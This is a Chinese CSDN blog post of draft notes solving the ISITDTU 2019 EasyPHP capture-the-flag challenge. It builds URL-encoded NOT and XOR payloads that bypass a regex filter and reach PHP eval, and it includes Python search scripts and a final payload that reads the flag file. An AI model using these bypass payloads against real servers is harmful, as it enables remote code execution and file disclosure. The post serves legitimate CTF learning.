[ISITDTU 2019]EasyPHP 之草稿笔记(仅为草稿)

最新推荐文章于 2024-07-19 22:19:03 发布
最新推荐文章于 2024-07-19 22:19:03 发布
阅读量570 收藏
点赞数
分类专栏: writeup 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46266956/article/details/125136248
版权

[ISITDTU 2019]EasyPHP

<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

$a='phpinfo';
print(urlencode(~$a));

%8F%97%8F%96%91%99%90

(~%8F%97%8F%96%91%99%90)()
((%8F%97%8F%96%91%99%90)^(%FF%FF%FF%FF%FF%FF%FF))()

print(1);

print_r(scandir('.'));



'a'的取反
%D8%9E%D8

print的取反
%8F%8D%96%91%8B

print('a');
?_=(~%8F%8D%96%91%8B)(~%D8%9E%D8);

%CE%CF%CF
?_=(~%8F%8D%96%91%8B)(~%CE%CF%CF);

print_r(scandir('.'));

((%8d%8d%8d%8d%8d%8d%9e%8d)^(%9a%8d%8d%8d%8d%8d%9b%8d)^(%9a%9a%9e%9b%99%96%96%9a)^(%ff%ff%ff%ff%ff%ff%ff%ff))(((%8d%9e%8d)^(%8d%99%8d)^(%9a%96%9b)^(%ff%ff%ff))(((%8d%9e%8d%9e%8d%8d%8d)^(%9a%9b%8d%99%8d%8d%9a)^(%9b%99%9e%96%9b%96%9a)^(%ff%ff%ff%ff%ff%ff%ff))(%d1^%ff)));


(%8d%8d%8d%8d%8d%8d%9e%8d)^(%9a%8d%8d%8d%8d%8d%9b%8d)^(%9a%9a%9e%9b%99%96%96%9a)^(%ff%ff%ff%ff%ff%ff%ff%ff)

print(urldecode('%8d%8d%8d%8d%8d%8d%9e%8d')^urldecode('%9a%8d%8d%8d%8d%8d%9b%8d')^urldecode('%9a%9a%9e%9b%99%96%96%9a')^urldecode('%ff%ff%ff%ff%ff%ff%ff%ff'));

readfile

rrrrrrar
errrrrdr
eeadfiie
readfile

print(~urldecode('%8d%8d%8d%8d%8d%8d%9e%8d'));
print("\n");
print(~urldecode('%9a%8d%8d%8d%8d%8d%9b%8d'));
print("\n");
print(~urldecode('%9a%9a%9e%9b%99%96%96%9a'));
print("\n");
print(urldecode('%8d%8d%8d%8d%8d%8d%9e%8d')^urldecode('%9a%8d%8d%8d%8d%8d%9b%8d')^urldecode('%9a%9a%9e%9b%99%96%96%9a')^urldecode('%ff%ff%ff%ff%ff%ff%ff%ff'));

((%ff%ff%ff%ff%ff%ff%ff)^(%8b%9c%9b%8b%8b%8b%9c)^(%8b%8f%9c%8b%9b%8b%8f)^(%8f%9e%91%91%9b%a0%9e))(((%8b%8b%8b%8b%8b%9b%9c)^(%9b%8b%8b%8b%8b%9c%8f)^(%9c%9c%9e%91%9b%91%9e)^(%ff%ff%ff%ff%ff%ff%ff))(%d1^%ff));


print(~urldecode('%8b%9c%9b%8b%8b%8b%9c'));
print("\n");
print(~urldecode('%8b%8f%9c%8b%9b%8b%8f'));
print("\n");
print(~urldecode('%8f%9e%91%91%9b%a0%9e'));
print("\n");
print(urldecode('%ff%ff%ff%ff%ff%ff%ff')^urldecode('%8b%9c%9b%8b%8b%8b%9c')^urldecode('%8b%8f%9c%8b%9b%8b%8f')^urldecode('%8f%9e%91%91%9b%a0%9e'));


print(~urldecode('%8b%8b%8b%8b%8b%9b%9c'));
print("\n");
print(~urldecode('%9b%8b%8b%8b%8b%9c%8f'));
print("\n");
print(~urldecode('%9c%9c%9e%91%9b%91%9e'));
print("\n");
print(urldecode('%ff%ff%ff%ff%ff%ff%ff')^urldecode('%8b%8b%8b%8b%8b%9b%9c')^urldecode('%9b%8b%8b%8b%8b%9c%8f')^urldecode('%9c%9c%9e%91%9b%91%9e'));

tcdtttc
tpctdtp
pannd_a
print_r

tttttdc
dttttcp
ccandna
scandir

print_r(scandir(.));
r=a p c
i=d c n
s=t d c

寻找可替换字符脚本:

original = 'print_rscandir'
option = 3

original = list(set(original))
print(original)

def find(original1,s,option):
    ss=''
    for i in s:
        for a in original1:
            for b in original1:
                for c in original1:
                    if (ord(a) ^ ord(b) ^ ord(c) == ord(i)) and  a!=i and b!=i and c !=i:
                        print("{}={}^{}^{}".format(i, a, b, c))
                        if i not in ss:
                            ss = ss +i
    if len(ss) == option:
        print(ss+'     '+ss+ss)



for q in original:
    for w in original:
        for e in original:
            if q!=w and w!= e and q!=e:
                s=''
                s=q+w+e
                print(s)


                newOriginal = ''.join(original)
                for r in s:
                    newOriginal = newOriginal.strip(r)
                find(newOriginal,s,option)
                print('\n\n\n\n')


isd
i=t^n^s
s=t^i^n
d=t^s^c


target===print_r(scandir(.));

print_r
rptpppp
rpnpppp
prsnt_r

scandir
taccttc
iaccsnc
ncancsr

print_r
$a='rptpppp';
print(urlencode(~$a));
print("\n");
$b='rpnpppp';
print(urlencode(~$b));
print("\n");
$c='prsnt_r';
print(urlencode(~$c));
print("\n");

scandir
$d='taccttc';
print(urlencode(~$d));
print("\n");
$e='iaccsnc';
print(urlencode(~$e));
print("\n");
$f='ncancsr';
print(urlencode(~$f));
print("\n");


%8D%8F%8B%8F%8F%8F%8F
%8D%8F%91%8F%8F%8F%8F
%8F%8D%8C%91%8B%A0%8D
%FF%FF%FF%FF%FF%FF%FF

%8B%9E%9C%9C%8B%8B%9C
%96%9E%9C%9C%8C%91%9C
%91%9C%9E%91%9C%8C%8D

print_r(scandir('.')) == ((%8D%8F%8B%8F%8F%8F%8F)^(%8D%8F%91%8F%8F%8F%8F)^(%8F%8D%8C%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8B%9E%9C%9C%8B%8B%9C)^(%96%9E%9C%9C%8C%91%9C)^(%91%9C%9E%91%9C%8C%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%d1^%ff));


print(~urldecode('%8D%8F%8B%8F%8F%8F%8F'));
print("\n");
print(~urldecode('%8D%8F%91%8F%8F%8F%8F'));
print("\n");
print(~urldecode('%8F%8D%8C%91%8B%A0%8D'));
print("\n");
print(urldecode('%ff%ff%ff%ff%ff%ff%ff')^urldecode('%8D%8F%8B%8F%8F%8F%8F')^urldecode('%8D%8F%91%8F%8F%8F%8F')^urldecode('%8F%8D%8C%91%8B%A0%8D'));
print("\n");


print(~urldecode('%8B%9E%9C%9C%8B%8B%9C'));
print("\n");
print(~urldecode('%96%9E%9C%9C%8C%91%9C'));
print("\n");
print(~urldecode('%91%9C%9E%91%9C%8C%8D'));
print("\n");
print(urldecode('%ff%ff%ff%ff%ff%ff%ff')^urldecode('%8B%9E%9C%9C%8B%8B%9C')^urldecode('%96%9E%9C%9C%8C%91%9C')^urldecode('%91%9C%9E%91%9C%8C%8D'));
print("\n");


print_r(scandir(.));
^.;()  print_scand  <=13


snr
s=d^t^c
n=d^c^i
r=c^p^a

target == print_r(scandir(.));

print_r
icpdppc
ippcppp
paiit_a

scandir
dacdccc
taccccp
ccaidia


===
icpdppc
ippcppp
paiit_a
dacdccc
taccccp
ccaidia

icpdppc,ippcppp,paiit_a,dacdccc,taccccp,ccaidia

%96%9C%8F%9B%8F%8F%9C
%96%8F%8F%9C%8F%8F%8F
%8F%9E%96%96%8B%A0%9E
%9B%9E%9C%9B%9C%9C%9C
%8B%9E%9C%9C%9C%9C%8F
%9C%9C%9E%96%9B%96%9E
?_=((%96%9C%8F%9B%8F%8F%9C)^(%96%8F%8F%9C%8F%8F%8F)^(%8F%9E%96%96%8B%A0%9E)^(%FF%FF%FF%FF%FF%FF%FF))(((%9B%9E%9C%9B%9C%9C%9C)^(%8B%9E%9C%9C%9C%9C%8F)^(%9C%9C%9E%96%9B%96%9E)^(%FF%FF%FF%FF%FF%FF%FF))(%d1^%ff));

n0t_a_flAg_FiLe_dONT_rE4D_7hIs.txt

读文件
show_source
readfile

target == show_source(end(scandir(.)));
^.;() show_urcendai  <=13

show_source(end(scandir(.)));

n=r^i^u
e=d^i^h
s=h^i^r
c=h^d^o

show_source
hohhhhhhhhd
iohhhihhhdi
rhow_rouroh

end
dro
iio
hud

scandir
hhorooo
idoiooo
roaudir

hohhhhhhhhd
iohhhihhhdi
rhow_rouroh
dro
iio
hud
hhorooo
idoiooo
roaudir

'hohhhhhhhhd','iohhhihhhdi','rhow_rouroh','dro','iio','hud','hhorooo','idoiooo','roaudir'

 
%97%90%97%97%97%97%97%97%97%97%9B
%96%90%97%97%97%96%97%97%97%9B%96
%8D%97%90%88%A0%8D%90%8A%8D%90%97
%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF
%9B%8D%90
%96%96%90
%97%8A%9B
%FF%FF%FF
%97%97%90%8D%90%90%90
%96%9B%90%96%90%90%90
%8D%90%9E%8A%9B%96%8D
%FF%FF%FF%FF%FF%FF%FF

?_=((%97%90%97%97%97%97%97%97%97%97%9B)^(%96%90%97%97%97%96%97%97%97%9B%96)^(%8D%97%90%88%A0%8D%90%8A%8D%90%97)^(%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF))(((%9B%8D%90)^(%96%96%90)^(%97%8A%9B)^(%FF%FF%FF))(((%97%97%90%8D%90%90%90)^(%96%9B%90%96%90%90%90)^(%8D%90%9E%8A%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%d1^%ff)));

osuan
o=c^i^e
s=r^i^h
u=c^r^d
a=r^d^w
n=c^i^d

show_source
rwchhrcchhh
iwihhiirhhh
hhew_hedrce

end
dce
die
edd

scandir
rdrcidd
iddiidd
hcwddir

rwchhrcchhh
iwihhiirhhh
hhew_hedrce
dce
die
edd
rdrcidd
iddiidd
hcwddir

'rwchhrcchhh','iwihhiirhhh','hhew_hedrce','dce','die','edd','rdrcidd','iddiidd','hcwddir'

 
%8D%88%9C%97%97%8D%9C%9C%97%97%97
%96%88%96%97%97%96%96%8D%97%97%97
%97%97%9A%88%A0%97%9A%9B%8D%9C%9A
%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF
%9B%9C%9A
%9B%96%9A
%9A%9B%9B
%FF%FF%FF
%8D%9B%8D%9C%96%9B%9B
%8D%9B%8D%9C%96%9B%9B
%97%9C%88%9B%9B%96%8D
%FF%FF%FF%FF%FF%FF%FF

?_=((%8D%88%9C%97%97%8D%9C%9C%97%97%97)^(%96%88%96%97%97%96%96%8D%97%97%97)^(%97%97%9A%88%A0%97%9A%9B%8D%9C%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF))(((%9B%9C%9A)^(%9B%96%9A)^(%9A%9B%9B)^(%FF%FF%FF))(((%8D%9B%8D%9C%96%9B%9B)^(%8D%9B%8D%9C%96%9B%9B)^(%97%9C%88%9B%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

以上还是失败

终极版字符替换脚本:

from itertools import combinations
target='show_urcendai'
option=6
result=''


target=list(set(target))#去重,但无序
print(target)
targetOption=combinations(target,option)
def find(targetOption,targetRemaining,option,result):
    ss=''
    for i in targetOption:
        for a in targetRemaining:
            for b in targetRemaining:
                for c in targetRemaining:
                    if (ord(a) ^ ord(b) ^ ord(c) == ord(i)) and  a!=i and b!=i and c !=i:
                        # print("{}={}^{}^{}".format(i, a, b, c))
                        if i not in ss:
                            ss = ss +i
    if len(ss) == option:
        print(ss+"符合要求")
        result=result+ss+'  '
        findPrint(targetOption,targetRemaining)
    return result
def findPrint(targetOption,targetRemaining):
    for i in targetOption:
        for a in targetRemaining:
            for b in targetRemaining:
                for c in targetRemaining:
                    if (ord(a) ^ ord(b) ^ ord(c) == ord(i)) and  a!=i and b!=i and c !=i:
                        print("{}={}^{}^{}".format(i, a, b, c))
for i in targetOption:
    targetRemaining=list(set(target)-set(i))
    # print(i)
    result=find(i,targetRemaining,option,result)
print('符合要求的全部内容:'+result)

$a=array('hsrhhhrnheh','hsnhhhnhhnh','shsw_sssrhe','nee','ner','ens','neesern','nnwsrhn','shsnssr');
foreach ($a as $s){
    print(urlencode(~$s));
    print("\n");
}

iaocdu
i=r^h^s
a=e^w^s
o=r^n^s
c=e^n^h
d=e^r^s
u=n^h^s
target=='show_source(end(scandir()))'

target1='show_source'

show_source
hsrhhhrnheh
hsnhhhnhhnh
shsw_sssrhe

end
nee
ner
ens

scandir
neesern
nnwsrhn
shsnssr

hsrhhhrnheh
hsnhhhnhhnh
shsw_sssrhe
nee
ner
ens
neesern
nnwsrhn
shsnssr

'hsrhhhrnheh','hsnhhhnhhnh','shsw_sssrhe','nee','ner','ens','neesern','nnwsrhn','shsnssr'
 
%97%8C%8D%97%97%97%8D%91%97%9A%97
%97%8C%91%97%97%97%91%97%97%91%97
%8C%97%8C%88%A0%8C%8C%8C%8D%97%9A
%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF
%91%9A%9A
%91%9A%8D
%9A%91%8C
%FF%FF%FF
%91%9A%9A%8C%9A%8D%91
%91%91%88%8C%8D%97%91
%8C%97%8C%91%8C%8C%8D
%FF%FF%FF%FF%FF%FF%FF
?_=((%97%8C%8D%97%97%97%8D%91%97%9A%97)^(%97%8C%91%97%97%97%91%97%97%91%97)^(%8C%97%8C%88%A0%8C%8C%8C%8D%97%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF%FF))(((%91%9A%9A)^(%91%9A%8D)^(%9A%91%8C)^(%FF%FF%FF))(((%91%9A%9A%8C%9A%8D%91)^(%91%91%88%8C%8D%97%91)^(%8C%97%8C%91%8C%8C%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

终于成功

Jerem1ah
关注
专栏目录
[ISITDTU 2019]EasyPHP
wjd19980925的博客
06-08 856
[ISITDTU 2019]EasyPHP
BUUCTF:[ISITDTU 2019]EasyPHP --- rce 超级异或,,,吐了,,,字符之间异或, 成型的异或payload!!!
Zero_Adam的博客
04-06 1669
目录:一、自己做:二、学的的三、学习WP1. 这里先来个不限制字符个数的关于这个%ff 以及异或的事情,咱们好好唠唠1.生成异或中间值的python脚本2. 看有字符限制的时候,:!!干了,,发现了一个更好多python脚本,,接着做题~。 一、自己做: <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) di
buuctf之[ISITDTU 2019]EasyPHP
最新发布
dalaojiaoweb的博客
07-19 361
可以看到过滤了许多函数,但是没有过滤掉scandir(),var_dump(),readfile(),print_r()等函数。然后我们挑选几个字符将其替换掉 ,这里我们选n==c^d^i 91 => ["9c","9b","96"],readline(end(scandir(.)))来进行读取。接下来就可以进行做题了,这种情况并没有过滤^很明显是使用一个异或绕过来进行rce的。可以看到有两个if语句,我们想要在绕过这两个if语句来进行漏洞执行。是一个参数掩码,表示只返回出现的字符。
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
EasyPHP-3.0-setup.rar_EasyPHP-3.0-setup_EasyPHP-3.1_Easyphp3.0_e
09-14
该版本为英文版,意味着对于非英语使用者可能会有一定的语言障碍,但整体操作流程相对直观,适合有一定计算机基础的用户自行安装。 EasyPHP-3.1和EasyPHP3.0是EasyPHP的不同版本。一般来说,更新的版本会包含更多的...
BUUCTF:[ISITDTU 2019]EasyPHP
末初的CSDN博客
04-27 4514
题目地址:BUUCTF:[ISITDTU 2019]EasyPHP Refer: https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/ 思路很简单,绕过这两个if即可任意代码执行 先看一下第一个正则匹配 看不懂的推荐使用这个网站:https://regex101.com/ if ( preg_match('/[\x00- 0-9\'"...
buuCTF [ISITDTU 2019]EasyPHP 1
weixin_45642610的博客
08-08 827
buuCTF [ISITDTU 2019]EasyPHP 1 直接代码审计。 第一个if,过preg_match。一般有三种方法:取反绕过,异或绕过,转义绕过。 这里用取反绕过。 第二个if的意思是输入的字符串不重复的字符长度不超过0xd即13。如aaa((bc不重复字符为a(bc长度为4。 尝试phpinfo: ?_=(%ff%ff%ff%ff%ff%ff%ff^%8f%97%8f%96%91%99%90)(); 可以去看看disable_function禁了哪些函数。 附上异或php脚本: &lt
[ISITDTU 2019]EasyPHP 异或RCE count_chars() 限制长度 通过 构造存在字符获取减小长度
m0_64180167的博客
12-13 514
发现确实是 print_r 为什么我们需要这种格式呢 我们下面来看这个形式。然后这里使用 readline(end(scandir(.))) 即可。我们之前获取到的取反 其实都是通过 ~ 来获取的 所以这里无法体现。成功执行 这里我们 这里过滤了 system等 使用 prin。这里我们发现 需要字符不能超过13个 我们首先看看构造。print_r(scandir(.)) 需要多少个。我们看看是不是我们构造的print_r。我们使用代码输出看看是不是我们需要的。我们将我们的取反进行修改。
[ISITDTU 2019]EasyPHP php异或绕过减少字符数
scrawman的博客
01-22 1102
[ISITDTU 2019]EasyPHP 一个正则绕过,先看正则匹配过滤了什么 \x00- (\x20) 过滤了00到20的十六进制字符 0-9 过滤了数字 ’ "`$&.,过滤了这些字符和\x7f字符 count_chars模式选为3的话统计字符串里出现过的字符,题目中设置不能超过13(0xd)个 但是没有过滤~和^,可以取反和异或绕过。 <?php echo urlencode(~'phpinfo'); ?> 先用_=(~%8F%97%8F%96%91%99%90)();看
[ISITDTU 2019]EasyPHP异或绕过
Aiwin的博客
08-24 575
[ISITDTU 2019]EasyPHP count_chars()函数异或绕过
BUUCTF--[ISITDTU 2019]EasyPHP
qq_46263951的博客
07-21 1433
来看给出的php代码 <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it'); if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so close, om..
EasyPHP:一站式PHP开发与调试环境
"EasyPHP是一个集成化的开发环境,它包含了Apache服务器、PHP解释器、MySQL数据库以及Zend优化器和PhpMyAdmin等工具,为开发者提供了一站式的PHP开发和调试平台。通过EasyPHP,用户可以在本地计算机上快速搭建一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jerem1ah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值